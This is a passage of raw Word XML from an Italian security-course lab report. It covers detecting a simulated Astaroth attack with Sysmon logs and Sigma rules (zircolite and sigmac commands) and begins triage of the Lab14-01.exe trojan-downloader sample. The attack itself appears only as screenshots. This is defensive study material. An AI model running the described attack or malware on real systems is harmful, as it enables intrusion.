      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="672F7DAF" w14:textId="77777777" w:rsidR="007F666F" w:rsidRDefault="007F666F" w:rsidP="00A345A4">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5263BEB1" w14:textId="77777777" w:rsidR="007F666F" w:rsidRDefault="007F666F" w:rsidP="00A345A4">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20616A41" w14:textId="59614347" w:rsidR="00480169" w:rsidRDefault="007F666F" w:rsidP="00A345A4">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7293C4C8" wp14:editId="384D0753">
            <wp:simplePos x="457200" y="653143"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="6645910" cy="7185660"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1725165918" name="Immagine 20" descr="Immagine che contiene testo, schermata, menu&#10;&#10;Descrizione generata automaticamente">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5918" name="Immagine 20" descr="Immagine che contiene testo, schermata, menu&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId277"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId278"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="7185660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="035ED28A" w14:textId="77777777" w:rsidR="00480169" w:rsidRDefault="00480169">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E59E2DD" w14:textId="77777777" w:rsidR="007F666F" w:rsidRDefault="007F666F" w:rsidP="00A345A4">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77D3EAEA" w14:textId="391CE903" w:rsidR="008F612C" w:rsidRDefault="008F612C" w:rsidP="008F612C">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc140165835"/>
      <w:r>
        <w:t>8.3 Sysmon</w:t>
      </w:r>
      <w:r w:rsidR="004F4D80">
        <w:t xml:space="preserve"> e Sigma Rules</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="6F2D4752" w14:textId="7E00FADD" w:rsidR="004F4D80" w:rsidRPr="004F4D80" w:rsidRDefault="004F4D80" w:rsidP="004F4D80">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Iniziamo </w:t>
      </w:r>
      <w:r w:rsidR="00F87B17">
        <w:t>registrando gli eventi tramite sysmon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55941DCC" w14:textId="6DE4A129" w:rsidR="004C073B" w:rsidRDefault="00A745D9" w:rsidP="00A345A4">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="770799B4" wp14:editId="1C037E19">
            <wp:extent cx="6645910" cy="2500630"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="148310463" name="Immagine 24" descr="Immagine che contiene testo, schermata, software&#10;&#10;Descrizione generata automaticamente">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463" name="Immagine 24" descr="Immagine che contiene testo, schermata, software&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId279"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId280"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2500630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74921E" w14:textId="429B5BD4" w:rsidR="00276AE4" w:rsidRDefault="00F87B17" w:rsidP="00A345A4">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Successivamente eseguiamo l’attacco Astaroth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3D72F9" w14:textId="69A5F530" w:rsidR="00752000" w:rsidRDefault="00877F5E" w:rsidP="00516BDC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="743A18A6" wp14:editId="201379E1">
            <wp:extent cx="5257800" cy="5022969"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="980773457" name="Immagine 28" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">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3457" name="Immagine 28" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId281"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId282"/>
                    <a:srcRect t="6368" r="7414" b="6773"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5277613" cy="5041897"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FD3CFF" w14:textId="77777777" w:rsidR="00F87B17" w:rsidRDefault="00F87B17" w:rsidP="00F87B17">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E24A024" w14:textId="0FC1B719" w:rsidR="00557571" w:rsidRDefault="00557571" w:rsidP="00516BDC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1599FE0B" wp14:editId="2637665C">
            <wp:extent cx="6645910" cy="3757930"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1132477849" name="Immagine 30" descr="Immagine che contiene testo, software, Software multimediale, Software per la grafica&#10;&#10;Descrizione generata automaticamente">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7849" name="Immagine 30" descr="Immagine che contiene testo, software, Software multimediale, Software per la grafica&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId283"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId284"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="3757930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E23F47A" w14:textId="04ACBEAA" w:rsidR="00B20859" w:rsidRDefault="00B20859" w:rsidP="00F87B17">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="721B21C6" wp14:editId="70BE28CA">
            <wp:extent cx="6645910" cy="3905250"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="594175891" name="Immagine 34" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">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5891" name="Immagine 34" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId285"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId286"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="3905250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5905BC7C" w14:textId="77777777" w:rsidR="00B20859" w:rsidRDefault="00B20859" w:rsidP="00F87B17">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06C4366C" w14:textId="77777777" w:rsidR="00B20859" w:rsidRDefault="00B20859" w:rsidP="00F87B17">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18857901" w14:textId="4C1CC527" w:rsidR="00F87B17" w:rsidRDefault="00F87B17" w:rsidP="00F87B17">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Verifichiamo gli eventi raccolti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733D69B8" w14:textId="20027BE7" w:rsidR="00276AE4" w:rsidRDefault="00F70F7B" w:rsidP="00516BDC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A580F15" wp14:editId="6CB0928C">
            <wp:extent cx="6645910" cy="3244215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1174729954" name="Immagine 31" descr="Immagine che contiene schermata, testo, software, Pagina Web&#10;&#10;Descrizione generata automaticamente">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9954" name="Immagine 31" descr="Immagine che contiene schermata, testo, software, Pagina Web&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId287"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId288"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="3244215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13438BEC" w14:textId="031B1CE4" w:rsidR="00276AE4" w:rsidRDefault="00276AE4" w:rsidP="00276AE4">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2157E2C3" w14:textId="379DBAF0" w:rsidR="00F87B17" w:rsidRDefault="00276AE4" w:rsidP="00CC74B6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B86535D" wp14:editId="4B38FE1C">
            <wp:extent cx="3696789" cy="1911621"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1335547202" name="Immagine 2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7202" name="Immagine 27" descr="Immagine che contiene testo, schermata, numero, Carattere&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId289"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3721393" cy="1924344"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F05505D" w14:textId="371CF799" w:rsidR="00683D1D" w:rsidRDefault="00683D1D">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375517"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1. python3 .\zircolite.py --evtx C:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>/Users/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>unina/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00E0E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Desktop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>/LAB16/sysmon_log.evtx --ruleset C:\Users\unina\Desktop\LAB16\rules_astaroth.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A73A7BF" w14:textId="77777777" w:rsidR="00B43255" w:rsidRDefault="00B43255" w:rsidP="00683D1D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C2B6FBD" w14:textId="10EC087A" w:rsidR="00B43255" w:rsidRDefault="00B43255" w:rsidP="00516BDC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A0DE9F1" wp14:editId="5A9CA28B">
            <wp:extent cx="6429829" cy="4081640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2146799499" name="Immagine 33" descr="Immagine che contiene schermata, testo, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">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9499" name="Immagine 33" descr="Immagine che contiene schermata, testo, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId290"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId291"/>
                    <a:srcRect l="5208" t="5068" r="15966" b="5973"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6489220" cy="4119342"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B530864" w14:textId="4999BA22" w:rsidR="00D42F96" w:rsidRDefault="00D42F9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638342"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1. python3 .\tools\sigmac -t sqlite -c tools/config/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>generic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>/sysmon.yml -c tools/config/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>generic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>/powershell.yml -c tools/config/zircolite.yml -d C:\Users\unina\Desktop\LAB16\rules -r --output-fields title,id,description,author,tags,level,falsepositives,filename,status --output-format json -o C:\Users\unina\Desktop\LAB16\new_rules1.json --backend-option table=logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3DEFAE" w14:textId="7419F397" w:rsidR="00B978E5" w:rsidRDefault="00B978E5" w:rsidP="00516BDC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22A2E237" wp14:editId="3FB9B076">
            <wp:extent cx="5843979" cy="3141617"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="306796829" name="Immagine 32" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">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6829" name="Immagine 32" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId292"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId293"/>
                    <a:srcRect r="39854" b="42517"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5863038" cy="3151863"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CF1893" w14:textId="7D3BF65D" w:rsidR="00891283" w:rsidRDefault="00A665E2" w:rsidP="00516BDC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I file sono presenti nella </w:t>
      </w:r>
      <w:hyperlink r:id="rId294" w:history="1">
        <w:r w:rsidRPr="00A665E2">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>cartella</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00673FFB" w14:textId="77777777" w:rsidR="00891283" w:rsidRDefault="00891283">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27460B56" w14:textId="111D5BCA" w:rsidR="00F5699C" w:rsidRDefault="00F5699C" w:rsidP="00F5699C">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc140165836"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>8.4 Snort Optional Task</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="7E7E9425" w14:textId="6F8AE982" w:rsidR="00CE52A2" w:rsidRDefault="00CE52A2" w:rsidP="00F5699C">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Analizziamo il Lab14-01.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D177D9D" w14:textId="75168C44" w:rsidR="00CE52A2" w:rsidRDefault="007E0B80" w:rsidP="007E0B80">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D10081B" wp14:editId="4074616B">
            <wp:extent cx="6128489" cy="4232365"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="1105874624" name="Immagine 1" descr="Immagine che contiene testo, schermata, numero&#10;&#10;Descrizione generata automaticamente">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4624" name="Immagine 1" descr="Immagine che contiene testo, schermata, numero&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId295"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId296"/>
                    <a:srcRect l="5700" r="5850"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6140079" cy="4240369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FF0353" w14:textId="1BB89C26" w:rsidR="007E0B80" w:rsidRPr="00F5699C" w:rsidRDefault="00446BAC" w:rsidP="007E0B80">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72504EA6" wp14:editId="37EDE628">
            <wp:extent cx="6645910" cy="3010535"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1831657365" name="Immagine 2" descr="Immagine che contiene testo, ricevuta, algebra&#10;&#10;Descrizione generata automaticamente">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7365" name="Immagine 2" descr="Immagine che contiene testo, ricevuta, algebra&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId297"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId298"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="3010535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="144B2D9B" wp14:editId="52F868F4">
            <wp:extent cx="6645910" cy="991235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1923221303" name="Immagine 3" descr="Immagine che contiene testo, schermata, Carattere, ricevuta&#10;&#10;Descrizione generata automaticamente">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1303" name="Immagine 3" descr="Immagine che contiene testo, schermata, Carattere, ricevuta&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId299"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId300"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="991235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43966F63" w14:textId="625B940B" w:rsidR="00A665E2" w:rsidRDefault="00E51257" w:rsidP="004A2CA9">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">L’eseguibile creato in data </w:t>
      </w:r>
      <w:r w:rsidR="00CC561B">
        <w:t>27-02-2011 viene riconosciuto come trojan-downloader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2AA43A" w14:textId="5258DE82" w:rsidR="00CC561B" w:rsidRDefault="00A9592E" w:rsidP="004A2CA9">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La grandezza virtuale non è molto </w:t>
      </w:r>
      <w:r w:rsidR="001D696D">
        <w:t xml:space="preserve">più grande di quella fisica quindi </w:t>
      </w:r>
      <w:r w:rsidR="00325156">
        <w:t>si presu</w:t>
      </w:r>
      <w:r w:rsidR="002755D3">
        <w:t>me che non sia compresso. L’entropia del testo è alta quindi potrebbe essere offuscato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D0B015" w14:textId="33B08AEC" w:rsidR="002755D3" w:rsidRDefault="000B1427" w:rsidP="000B1427">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16CE5648" wp14:editId="439EB1BC">
